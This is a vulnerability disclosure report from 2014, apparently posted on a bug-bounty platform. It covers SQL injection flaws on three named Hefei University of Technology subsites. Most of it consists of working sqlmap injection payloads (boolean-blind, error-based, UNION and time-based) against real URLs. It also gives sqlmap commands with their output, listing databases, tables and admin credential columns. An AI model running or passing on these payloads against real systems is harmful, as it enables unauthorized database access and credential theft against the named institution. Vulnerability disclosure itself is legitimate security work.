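2014-06-05: Details reported to the vendor; awaiting vendor response
2014-06-10: The vendor chose to ignore the vulnerability; details disclosed to the public
Hefei University of Technology subsites: MySQL injection
MySQL injection locations:
First: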
http://cadcg.hfut.edu.cn/allurl114.php?id=201104210
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=201104210 AND 3010=3010

    Type: UNION query
    Title: MySQL UNION query (NULL) - 4 columns
    Payload: id=201104210 UNION ALL SELECT NULL,NULL,CONCAT(0x7176776971,0x456c5a414a485a42786c,0x7172776571),NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=201104210 AND SLEEP(5)
---
Second:
http://qls.hfut.edu.cn/imagedetails.php?id=115
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=115 AND 8380=8380

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=115 AND (SELECT 3165 FROM(SELECT COUNT(*),CONCAT(0x7169617871,(SELECT (CASE WHEN (3165=3165) THEN 1 ELSE 0 END)),0x7161686571,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 17 columns
    Payload: id=-4983 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7169617871,0x5757754e424f4c564454,0x7161686571),NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=115 AND SLEEP(5)
---
Third:
http://jpkc.hfut.edu.cn/2008/dlfx/bencandy.php?id=491
---
Place: GET
Parameter: id
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=491' AND (SELECT 2063 FROM(SELECT COUNT(*),CONCAT(0x71787a7871,(SELECT (CASE WHEN (2063=2063) THEN 1 ELSE 0 END)),0x7176737471,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'GPRn'='GPRn

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=491' AND SLEEP(5) AND 'AWzr'='AWzr
---
First location:
#1. Enumerate the databases:
sqlmap -u http://cadcg.hfut.edu.cn/allurl114.php?id=201104210 --dbs
available databases [2]:
[*] c231cadcg
[*] information_schema
#2. Enumerate the tables:
sqlmap -u http://cadcg.hfut.edu.cn/allurl114.php?id=201104210 -D c231cadcg --tables
Database: c231cadcg
[3 tables]
+---------+
| dynamic |
| mynews  |
| xietong |
+---------+
Second location:
#1. Enumerate the databases:
sqlmap -u http://qls.hfut.edu.cn/imagedetails.php?id=115 --dbs
available databases [2]:
[*] c257qls
[*] information_schema
sqlmap -u http://qls.hfut.edu.cn/imagedetails.php?id=115 -D c257qls --tables
Database: c257qls
[16 tables]
+---------------+
| user          |
| admin         |
| article       |
| index_pic     |
| jgsz          |
| jgxy          |
| kefu          |
| link          |
| lwupload      |
| product_types |
| qq            |
| szdw_up_file  |
| teacher       |
| types         |
| udf_temp      |
| upload        |
+---------------+
#3. Enumerate the columns:
sqlmap -u http://qls.hfut.edu.cn/imagedetails.php?id=115 -D c257qls -T admin --columns
Database: c257qls
Table: admin
[3 columns]
+--------+----------------------+
| Column | Type                 |
+--------+----------------------+
| id     | int(11) unsigned     |
| name   | varchar(30)          |
| pwd    | varchar(30)          |
+--------+----------------------+
Third location:
#1. Enumerate the databases:
sqlmap -u http://jpkc.hfut.edu.cn/2008/dlfx/bencandy.php?id=491 --dbs
available databases [2]:
[*] computer
[*] information_schema
sqlmap -u http://jpkc.hfut.edu.cn/2008/dlfx/bencandy.php?id=491 -D computer --tables
Database: computer
[162 tables]
Any gift? :)
Severity: no impact (ignored by vendor)
Ignored on: 2014-06-10 10:41
None yet